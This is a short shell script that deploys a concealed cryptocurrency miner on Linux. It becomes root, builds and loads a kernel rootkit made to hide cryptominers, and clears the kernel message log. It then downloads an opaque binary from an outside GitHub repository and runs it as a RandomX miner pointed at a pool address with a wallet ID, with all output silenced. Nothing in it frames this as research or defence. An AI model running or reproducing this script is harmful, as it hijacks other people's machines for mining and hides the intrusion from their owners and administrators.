#!/bin/sh
sudo su
apt-get update && apt-get upgrade
git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit >/dev/null >/dev/null 2>&1
cd hiding-cryptominers-linux-rootkit >/dev/null >/dev/null 2>&1
make
dmesg -C # clears all messages from the kernel ring buffer
insmod rootkit.ko
dmesg # verify that rootkit has been loaded
A=139.144.21.125:443
B=ZEPHsBz5DP8CQwW1ex5dF45MnEiysxKnWUxbsA1FjhMdAbj1tjub6mZ8zpywvMLqWYj1AQtbNdi6ffGVfwphDZiChWU5fsRM3xD
C=GAS
wget https://github.com/bengetsia/soft/raw/main/jilox && chmod u+x jilox
./jilox --url $A --user $B --pass $C --donate-level 1 -a rx/0 >/dev/null >/dev/null 2>&1
r

while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
